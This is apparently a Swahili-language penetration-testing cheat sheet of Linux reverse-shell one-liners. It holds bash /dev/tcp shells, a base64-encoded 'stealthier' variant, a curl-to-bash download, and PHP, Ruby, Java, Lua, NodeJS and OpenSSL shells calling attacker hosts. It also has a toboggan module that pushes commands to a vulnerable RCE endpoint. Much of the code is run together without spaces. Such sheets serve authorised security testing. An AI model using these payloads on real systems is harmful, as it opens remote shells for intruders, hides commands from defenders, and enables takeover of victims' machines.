curlhttps://reverse-shell.sh/1.1.1.1:3000|bashbash-i>&/dev/tcp/<ATTACKER-IP>/<PORT>0>&1bash-i>&/dev/udp/127.0.0.1/42420>&1#UDP0<&196;exec196<>/dev/tcp/<ATTACKER-IP>/<PORT>; sh<&196>&1962>&196exec5<>/dev/tcp/<ATTACKER-IP>/<PORT>; whilereadline0<&5; do $line 2>&5>&5; done#Short and bypass (credits to Dikline)(sh)0>/dev/tcp/10.10.10.10/9091#after getting the previous shell to get the output to executeexec>&0
Usisahau kuangalia na shell nyingine: sh, ash, bsh, csh, ksh, zsh, pdksh, tcsh, na bash.
Shell salama ya alama
#If you need a more stable connection do:bash-c'bash -i >& /dev/tcp/<ATTACKER-IP>/<PORT> 0>&1'#Stealthier method#B64 encode the shell like: echo "bash -c 'bash -i >& /dev/tcp/10.8.4.185/4444 0>&1'" | base64 -w0echobm9odXAgYmFzaCAtYyAnYmFzaCAtaSA+JiAvZGV2L3RjcC8xMC44LjQuMTg1LzQ0NDQgMD4mMScK|base64-d|bash2>/dev/null
Maelezo ya Shell
bash -i: Sehemu hii ya amri inaanzisha shell ya Bash ya kuingiliana (-i).
>&: Sehemu hii ya amri ni alama ya kifupi kwa kupeleka pato la kawaida (stdout) na kosa la kawaida (stderr) kwa mahali pamoja.
/dev/tcp/<ATTACKER-IP>/<PORT>: Hii ni faili maalum ambayo inaakisi muunganisho wa TCP kwa anwani ya IP na bandari iliyoainishwa.
Kwa kupeleka pato na mwelekeo wa makosa kwa faili hii, amri hiyo kwa ufanisi inatuma pato la kikao cha shell ya kuingiliana kwa mashine ya mshambuliaji.
0>&1: Sehemu hii ya amri inaelekeza ingizo la kawaida (stdin) kwa mahali sawa na pato la kawaida (stdout).
Wakati wa kushughulikia Remote Code Execution (RCE) udhaifu ndani ya programu ya wavuti inayotumia Linux, kupata reverse shell kunaweza kuzuia na ulinzi wa mtandao kama sheria za iptables au mifumo ya kuchuja pakiti ngumu. Katika mazingira kama haya, njia mbadala inahusisha kuanzisha PTY (Pseudo Terminal) shell ili kuingiliana na mfumo ulioathirika kwa ufanisi zaidi.
Zana inayopendekezwa kwa ajili ya hili ni toboggan, ambayo inarahisisha mwingiliano na mazingira ya lengo.
Ili kutumia toboggan kwa ufanisi, tengeneza moduli ya Python iliyoundwa kwa muktadha wa RCE wa mfumo wako wa lengo. Kwa mfano, moduli inayoitwa nix.py inaweza kuandikwa kama ifuatavyo:
import jwt
import httpx
def execute(command: str, timeout: float = None) -> str:
# Generate JWT Token embedding the command, using space-to-${IFS} substitution for command execution
token = jwt.encode(
{"cmd": command.replace(" ", "${IFS}")}, "!rLsQaHs#*&L7%F24zEUnWZ8AeMu7^", algorithm="HS256"
)
response = httpx.get(
url="https://vulnerable.io:3200",
headers={"Authorization": f"Bearer {token}"},
timeout=timeout,
# ||BURP||
verify=False,
)
# Check if the request was successful
response.raise_for_status()
return response.text
Na kisha, unaweza kukimbia:
toboggan-mnix.py-i
Ili kutumia moja kwa moja shell ya mwingiliano. Unaweza kuongeza -b kwa ajili ya uunganisho wa Burpsuite na kuondoa -i kwa wrapper ya rce ya msingi zaidi.
Kichwa na kiambatisho cha payload yako (ikiwa ipo)
Njia ambayo payload inatumwa (headers? data? taarifa za ziada?)
Kisha, unaweza tu kutuma amri au hata kutumia amri ya upgrade kupata PTY kamili (zingatia kwamba mabomba yanapojengwa na kuandikwa kwa kuchelewesha takriban 1.3s).
ruby-rsocket-e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'ruby-rsocket-e'exit if fork;c=TCPSocket.new("[IPADDR]","[PORT]");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
PHP
// Using 'exec' is the most common method, but assumes that the file descriptor will be 3.// Using this method may lead to instances where the connection reaches out to the listener and then closes.php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'// Using 'proc_open' makes no assumptions about what the file descriptor will be.// See https://security.stackexchange.com/a/198944 for more information<?php $sock=fsockopen("10.0.0.1",1234);$proc=proc_open("/bin/sh -i",array(0=>$sock,1=>$sock,2=>$sock), $pipes); ?><?php exec("/bin/bash -c 'bash -i >/dev/tcp/10.10.14.8/4444 0>&1'"); ?>
Java
r=Runtime.getRuntime()p=r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/ATTACKING-IP/80;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])p.waitFor()
#Linuxlua-e"require('socket');require('os');t=socket.tcp();t:connect('10.0.0.1','1234');os.execute('/bin/sh -i <&3 >&3 2>&3');"#Windows & Linuxlua5.1-e'local host, port = "127.0.0.1", 4444 local socket = require("socket") local tcp = socket.tcp() local io = require("io") tcp:connect(host, port); while true do local cmd, status, partial = tcp:receive() local f = io.popen(cmd, 'r') local s = f:read("*a") f:close() tcp:send(s) if status == "closed" then break end end tcp:close()'
NodeJS
(function(){var net =require("net"),cp =require("child_process"),sh =cp.spawn("/bin/sh", []);var client =newnet.Socket();client.connect(8080,"10.17.26.64",function(){client.pipe(sh.stdin);sh.stdout.pipe(client);sh.stderr.pipe(client);});return /a/; // Prevents the Node.js application form crashing})();orrequire('child_process').exec('nc -e /bin/sh [IPADDR] [PORT]')require('child_process').exec("bash -c 'bash -i >& /dev/tcp/10.10.14.2/6767 0>&1'")or-var x =global.process.mainModule.require-x('child_process').exec('nc [IPADDR] [PORT] -e /bin/bash')or// If you get to the constructor of a function you can define and execute another function inside a string"".sub.constructor("console.log(global.process.mainModule.constructor._load(\"child_process\").execSync(\"id\").toString())")()"".__proto__.constructor.constructor("console.log(global.process.mainModule.constructor._load(\"child_process\").execSync(\"id\").toString())")()or// Abuse this syntax to get a reverse shellvar fs =this.process.binding('fs');var fs =process.binding('fs');orhttps://gitlab.com/0x4ndr3/blog/blob/master/JSgen/JSgen.py
OpenSSL
Mshambuliaji (Kali)
opensslreq-x509-newkeyrsa:4096-keyoutkey.pem-outcert.pem-days365-nodes#Generate certificateopenssls_server-quiet-keykey.pem-certcert.pem-port<l_port>#Here you will be able to introduce the commandsopenssls_server-quiet-keykey.pem-certcert.pem-port<l_port2>#Here yo will be able to get the response